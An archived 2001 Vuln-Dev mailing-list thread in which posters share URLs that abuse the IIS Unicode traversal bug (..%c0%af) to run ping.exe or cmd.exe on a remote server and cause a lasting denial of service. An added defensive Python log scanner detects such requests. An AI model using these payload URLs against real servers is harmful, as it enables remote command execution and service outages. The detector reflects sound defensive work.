Vulnerability Development mailing list archives

Re: ping -i (TTL) Vulnerability


From: Reddog Hummer <reddog_33 () HOTMAIL COM>
Date: Thu, 22 Feb 2001 07:43:42 -0000

even better.

http://xx.xx.xx.xx/scripts/..%c0%af..%c0%af..%c0%af../winnt/system32/ping+-t+127.0.0.1+-i+0

this works when cmd is disabled
red

From: Reverend Lola <reverend_lola () YAHOO COM>
Reply-To: Reverend Lola <reverend_lola () YAHOO COM>
To: VULN-DEV () SECURITYFOCUS COM
Subject: Re: ping -i (TTL) Vulnerability
Date: Wed, 21 Feb 2001 15:34:49 -0800

>-----Original Message-----
>From: Damian Menscher [mailto:menscher () UIUC EDU]
>Sent: Wednesday, February 21, 2001 12:20 PM
>To: VULN-DEV () SECURITYFOCUS COM
>Subject: Re: ping -i (TTL) Vulnerability

%<-----SNIP----->%

>No doubt that this would do absolutely nothing from a remote location.

%<-----SNIP----->%

Actually, it does.

I used the Unicode bug to send the command to a remote
server (NT 4, SP6a, IIS4):
http://xx.xx.xx.xx/scripts/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+ping+-t+127.0.0.1+-i+0

CPU usage on the target server went to 100%, and
stayed there.  Task Manager showed ping.exe was using
a HUGE amount of system resources (this increased
memory usage by a bit as well).  I tried to stop
ping.exe, and could not.  Since ping.exe was started
by IIS, I then tried to stop the web server, but it
was not responding either.  The only way to stop it
was to reboot.

I'm sure the script kiddies will have fun with this
one.  :)


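A log check for the request pattern reported in this thread, added here as an example and not part of the original posts: it flags request URIs that carry overlong two-byte UTF-8 escapes such as `%c0%af` and notes when they collapse into `..` path segments. It generalizes to any `%c0`/`%c1` lead byte; the log layout, client addresses and status codes in the sample are constructed assumptions.

```python
import re
from urllib.parse import unquote

# Overlong two-byte UTF-8: a lead byte of 0xC0 or 0xC1 followed by a
# continuation byte (0x80-0xBF) encodes a code point below 0x80, which valid
# UTF-8 always writes as a single byte.
OVERLONG = re.compile(r"%(c[01])%([89ab][0-9a-f])", re.IGNORECASE)

def normalize_overlong(uri):
    """Collapse overlong sequences to ASCII; return (new_uri, hit_count)."""
    def collapse(m):
        lead, cont = int(m.group(1), 16), int(m.group(2), 16)
        return chr(((lead & 0x1F) << 6) | (cont & 0x3F))
    return OVERLONG.subn(collapse, uri)

def classify(uri):
    """Label a request URI 'clean', 'overlong' or 'overlong-traversal'."""
    collapsed, hits = normalize_overlong(uri)
    if hits == 0:
        return "clean"
    # Decode ordinary escapes too, then look for parent-directory segments
    # written with either path separator.
    path = unquote(collapsed.split("?", 1)[0], encoding="latin-1")
    return "overlong-traversal" if ".." in re.split(r"[/\\]", path) else "overlong"

def scan(log_text):
    """Return (client_ip, label) for every request that is not 'clean'."""
    findings = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 6:
            continue  # skip blank or malformed lines
        label = classify(fields[4])
        if label != "clean":
            findings.append((fields[2], label))
    return findings

# Constructed sample; assumed layout: date time client-ip method uri status.
SAMPLE_LOG = """\
2001-02-22 07:40:01 192.0.2.10 GET /default.htm 200
2001-02-22 07:41:17 192.0.2.44 GET /scripts/..%c0%af..%c0%af..%c0%af../winnt/system32/ping+-t+127.0.0.1+-i+0 200
2001-02-22 07:42:03 192.0.2.44 GET /scripts/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+ping+-t+127.0.0.1+-i+0 200
2001-02-22 07:43:30 192.0.2.77 GET /images/caf%c3%a9.gif 200
2001-02-22 07:44:12 192.0.2.80 GET /docs/%C1%81bout.htm 404
"""

if __name__ == "__main__":
    for ip, label in scan(SAMPLE_LOG):
        print(ip, label)
```

Valid multi-byte UTF-8 such as `%c3%a9` is left alone, so the check does not fire on ordinary non-ASCII file names.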

